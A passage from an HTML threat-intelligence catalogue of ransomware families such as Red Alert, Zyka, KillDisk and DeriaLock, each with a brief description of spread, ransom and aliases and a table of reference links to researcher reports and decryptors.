<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/edgelocker-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/edgelocker-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/BleepinComputer/status/815392891338194945">https://twitter.com/BleepinComputer/status/815392891338194945</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_red_alert"><a class="anchor" href="#_red_alert"></a><a class="link" href="#_red_alert">Red Alert</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Fake name: Microsoft Corporation. Based on HiddenTear</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1773. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/red-alert-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/red-alert-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/JaromirHorejsi/status/815557601312329728">https://twitter.com/JaromirHorejsi/status/815557601312329728</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_first"><a class="anchor" href="#_first"></a><a class="link" href="#_first">First</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1774. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/first-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/first-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_xcrypt_ransomware"><a class="anchor" href="#_xcrypt_ransomware"></a><a class="link" href="#_xcrypt_ransomware">XCrypt Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Written on Delphi. The user requests the victim to get in touch with him through ICQ to get the ransom and return the files.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1775. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/xcrypt-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/xcrypt-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/JakubKroustek/status/825790584971472902">https://twitter.com/JakubKroustek/status/825790584971472902</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_7zipper_ransomware"><a class="anchor" href="#_7zipper_ransomware"></a><a class="link" href="#_7zipper_ransomware">7Zipper Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1776. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/7zipper-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/7zipper-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://1.bp.blogspot.com/-ClM0LCPjQuk/WI-BgHTpdNI/AAAAAAAADc8/JyEQ8-pcJmsXIntuP-MMdE-pohVncxTXQCLcB/s1600/7-zip-logo.png">https://1.bp.blogspot.com/-ClM0LCPjQuk/WI-BgHTpdNI/AAAAAAAADc8/JyEQ8-pcJmsXIntuP-MMdE-pohVncxTXQCLcB/s1600/7-zip-logo.png</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zyka_ransomware"><a class="anchor" href="#_zyka_ransomware"></a><a class="link" href="#_zyka_ransomware">Zyka Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 170$ or EUR in Bitcoins.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1777. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/zyka-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/zyka-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.pcrisk.com/removal-guides/10899-zyka-ransomware">https://www.pcrisk.com/removal-guides/10899-zyka-ransomware</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://download.bleepingcomputer.com/demonslay335/StupidDecrypter.zip">https://download.bleepingcomputer.com/demonslay335/StupidDecrypter.zip</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/GrujaRS/status/826153382557712385">https://twitter.com/GrujaRS/status/826153382557712385</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sureransom_ransomeware_fake"><a class="anchor" href="#_sureransom_ransomeware_fake"></a><a class="link" href="#_sureransom_ransomeware_fake">SureRansom Ransomeware (Fake)</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to strike worldwide. This ransomware does not really encrypt your files. Ransom requested is £50 using credit card.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1778. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/sureransom-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/sureransom-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.forbes.com/sites/leemathews/2017/01/27/fake-ransomware-is-tricking-people-into-paying/#777faed0381c">http://www.forbes.com/sites/leemathews/2017/01/27/fake-ransomware-is-tricking-people-into-paying/#777faed0381c</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_netflix_ransomware"><a class="anchor" href="#_netflix_ransomware"></a><a class="link" href="#_netflix_ransomware">Netflix Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. This ransomware uses the known online library as a decoy. It poses as Netflix Code generator for Netflix login, but instead encrypts your files. The ransom is 100$ in Bitcoins.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1779. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/01/netflix-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/netflix-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/netflix-scam-delivers-ransomware/">http://blog.trendmicro.com/trendlabs-security-intelligence/netflix-scam-delivers-ransomware/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/rogue-netflix-app-spreads-netix-ransomware-that-targets-windows-7-and-10-users/">https://www.bleepingcomputer.com/news/security/rogue-netflix-app-spreads-netix-ransomware-that-targets-windows-7-and-10-users/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.darkreading.com/attacks-breaches/netflix-scam-spreads-ransomware/d/d-id/1328012">http://www.darkreading.com/attacks-breaches/netflix-scam-spreads-ransomware/d/d-id/1328012</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://4.bp.blogspot.com/-bQQ4DTIClvA/WJCIh6Uq2nI/AAAAAAAADfY/hB5HcjuGgh8rRJKeLHo" class="bare">https://4.bp.blogspot.com/-bQQ4DTIClvA/WJCIh6Uq2nI/AAAAAAAADfY/hB5HcjuGgh8rRJKeLHo</a><em>IRz3Ezth22-wCEw/s1600/form1.jpg[<a href="https://4.bp.blogspot.com/-bQQ4DTIClvA/WJCIh6Uq2nI/AAAAAAAADfY/hB5HcjuGgh8rRJKeLHo" class="bare">https://4.bp.blogspot.com/-bQQ4DTIClvA/WJCIh6Uq2nI/AAAAAAAADfY/hB5HcjuGgh8rRJKeLHo</a></em>IRz3Ezth22-wCEw/s1600/form1.jpg]</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://4.bp.blogspot.com/-ZnWdPDprJOg/WJCPeCtP4HI/AAAAAAAADfw/kR0ifI1naSwTAwSuOPiw8ZCPr0tSIz1CgCLcB/s1600/netflix-akk.png">https://4.bp.blogspot.com/-ZnWdPDprJOg/WJCPeCtP4HI/AAAAAAAADfw/kR0ifI1naSwTAwSuOPiw8ZCPr0tSIz1CgCLcB/s1600/netflix-akk.png</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_merry_christmas"><a class="anchor" href="#_merry_christmas"></a><a class="link" href="#_merry_christmas">Merry Christmas</a></h3>
<div class="paragraph">
<p>Its directed to English and Italian speaking users, therefore is able to infect worldwide. Most attacks are on organizations and servers. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. They pose as a Consumer complaint notification thats coming from Federal Trade Commission from USA, with an attached file called “complaint.pdf”. Written in Delphi by hacker MicrRP.</p>
</div>
<div class="paragraph">
<p>Merry Christmas is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Merry X-Mas</p>
</li>
<li>
<p>MRCR</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1780. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/mrcr1-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/mrcr1-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/-merry-christmas-ransomware-now-steals-user-private-data-via-diamondfox-malware/">https://www.bleepingcomputer.com/news/security/-merry-christmas-ransomware-now-steals-user-private-data-via-diamondfox-malware/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.zdnet.com/article/not-such-a-merry-christmas-the-ransomware-that-also-steals-user-data/">http://www.zdnet.com/article/not-such-a-merry-christmas-the-ransomware-that-also-steals-user-data/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/merry-christmas-ransomware-and-its-dev-comodosecurity-not-bringing-holiday-cheer/">https://www.bleepingcomputer.com/news/security/merry-christmas-ransomware-and-its-dev-comodosecurity-not-bringing-holiday-cheer/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/mrcr">https://decrypter.emsisoft.com/mrcr</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_seoirse_ransomware"><a class="anchor" href="#_seoirse_ransomware"></a><a class="link" href="#_seoirse_ransomware">Seoirse Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Seoirse is how in Ireland people say the name George. Ransom is 0.5 Bitcoins.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1781. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/seoirse-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/seoirse-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_killdisk_ransomware"><a class="anchor" href="#_killdisk_ransomware"></a><a class="link" href="#_killdisk_ransomware">KillDisk Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Every file is encrypted with a personal AES-key, and then AES-key encrypts with a RSA-1028 key. Hacking by TeleBots (Sandworm). Goes under a fake name: Update center or Microsoft Update center.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1782. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/killdisk-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/killdisk-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/killdisk-ransomware-now-targets-linux-prevents-boot-up-has-faulty-encryption/">https://www.bleepingcomputer.com/news/security/killdisk-ransomware-now-targets-linux-prevents-boot-up-has-faulty-encryption/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/killdisk-disk-wiping-malware-adds-ransomware-component/">https://www.bleepingcomputer.com/news/security/killdisk-disk-wiping-malware-adds-ransomware-component/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.zdnet.com/article/247000-killdisk-ransomware-demands-a-fortune-forgets-to-unlock-files/">http://www.zdnet.com/article/247000-killdisk-ransomware-demands-a-fortune-forgets-to-unlock-files/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.securityweek.com/destructive-killdisk-malware-turns-ransomware">http://www.securityweek.com/destructive-killdisk-malware-turns-ransomware</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/2017/01/05/killdisk-now-targeting-linux-demands-250k-ransom-cant-decrypt/">http://www.welivesecurity.com/2017/01/05/killdisk-now-targeting-linux-demands-250k-ransom-cant-decrypt/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://cyberx-labs.com/en/blog/new-killdisk-malware-brings-ransomware-into-industrial-domain/">https://cyberx-labs.com/en/blog/new-killdisk-malware-brings-ransomware-into-industrial-domain/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_derialock_ransomware"><a class="anchor" href="#_derialock_ransomware"></a><a class="link" href="#_derialock_ransomware">DeriaLock Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Maker is arizonacode and ransom amount is 20-30$. If the victim decides to pay the ransom, he will have to copy HWID and then speak to the hacker on Skype and forward him the payment.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1783. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/derialock-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/derialock-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/new-derialock-ransomware-active-on-christmas-includes-an-unlock-all-command/">https://www.bleepingcomputer.com/news/security/new-derialock-ransomware-active-on-christmas-includes-an-unlock-all-command/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_badencript_ransomware"><a class="anchor" href="#_badencript_ransomware"></a><a class="link" href="#_badencript_ransomware">BadEncript Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1784. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/badencript-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/badencript-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/demonslay335/status/813064189719805952">https://twitter.com/demonslay335/status/813064189719805952</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_adamlocker_ransomware"><a class="anchor" href="#_adamlocker_ransomware"></a><a class="link" href="#_adamlocker_ransomware">AdamLocker Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The name of the creator is puff69.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1785. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/adamlocker-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/adamlocker-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_alphabet_ransomware"><a class="anchor" href="#_alphabet_ransomware"></a><a class="link" href="#_alphabet_ransomware">Alphabet Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. This ransomware poses as Windows 10 Critical Update Service. Offers you to update your Windows 10, but instead encrypts your files. For successful attack, the victim must have .NET Framework 4.5.2 installed on him computer.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1786. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/alphabet-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/alphabet-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/PolarToffee/status/812331918633172992">https://twitter.com/PolarToffee/status/812331918633172992</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kokokrypt_ransomware"><a class="anchor" href="#_kokokrypt_ransomware"></a><a class="link" href="#_kokokrypt_ransomware">KoKoKrypt Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread by its creator in forums. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files and documents and more. The ransom is 0.1 bitcoins within 72 hours. Uses Windows Update as a decoy. Creator: Talnaci Alexandru</p>
</div>
<div class="paragraph">
<p>KoKoKrypt Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>KokoLocker Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1787. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/kokokrypt-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/kokokrypt-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://removevirusadware.com/tips-for-removeing-kokokrypt-ransomware/">http://removevirusadware.com/tips-for-removeing-kokokrypt-ransomware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_l33taf_locker_ransomware"><a class="anchor" href="#_l33taf_locker_ransomware"></a><a class="link" href="#_l33taf_locker_ransomware">L33TAF Locker Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 0.5 bitcoins. The name of the creator is staffttt, he also created Fake CryptoLocker</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1788. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/l33taf-locker-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/l33taf-locker-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pclock4_ransomware"><a class="anchor" href="#_pclock4_ransomware"></a><a class="link" href="#_pclock4_ransomware">PClock4 Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam (for example: “you have a criminal case against you”), fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<div class="paragraph">
<p>PClock4 Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>PClock SysGop Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1789. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/pclock4-sysgop-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/pclock4-sysgop-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_guster_ransomware"><a class="anchor" href="#_guster_ransomware"></a><a class="link" href="#_guster_ransomware">Guster Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. This ransomware uses VBS-script to send a voice message as the first few lines of the note.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1790. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/guster-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/guster-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/BleepinComputer/status/812131324979007492">https://twitter.com/BleepinComputer/status/812131324979007492</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_roga"><a class="anchor" href="#_roga"></a><a class="link" href="#_roga">Roga</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The hacker requests the ransom in Play Store cards. <a href="https://3.bp.blogspot.com/-ClUef8T55f4/WGKb8U4GeaI/AAAAAAAACzg/UFD0X2sORHYTVRNBSoqd5q7TBrOblQHmgCLcB/s1600/site.png" class="bare">https://3.bp.blogspot.com/-ClUef8T55f4/WGKb8U4GeaI/AAAAAAAACzg/UFD0X2sORHYTVRNBSoqd5q7TBrOblQHmgCLcB/s1600/site.png</a></p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1791. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/roga-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/roga-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptolocker3_ransomware"><a class="anchor" href="#_cryptolocker3_ransomware"></a><a class="link" href="#_cryptolocker3_ransomware">CryptoLocker3 Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Creator is staffttt and the ransom is 0.5 botcoins.</p>
</div>
<div class="paragraph">
<p>CryptoLocker3 Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Fake CryptoLocker</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1792. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/cryptolocker3-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/cryptolocker3-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_proposalcrypt_ransomware"><a class="anchor" href="#_proposalcrypt_ransomware"></a><a class="link" href="#_proposalcrypt_ransomware">ProposalCrypt Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The ransom is 1.0 bitcoins.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1793. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/proposalcrypt-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/proposalcrypt-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.archersecuritygroup.com/what-is-ransomware/">http://www.archersecuritygroup.com/what-is-ransomware/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/demonslay335/status/812002960083394560">https://twitter.com/demonslay335/status/812002960083394560</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/811613888705859586">https://twitter.com/malwrhunterteam/status/811613888705859586</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_manifestus_ransomware"><a class="anchor" href="#_manifestus_ransomware"></a><a class="link" href="#_manifestus_ransomware">Manifestus Ransomware</a></h3>
<div class="paragraph">
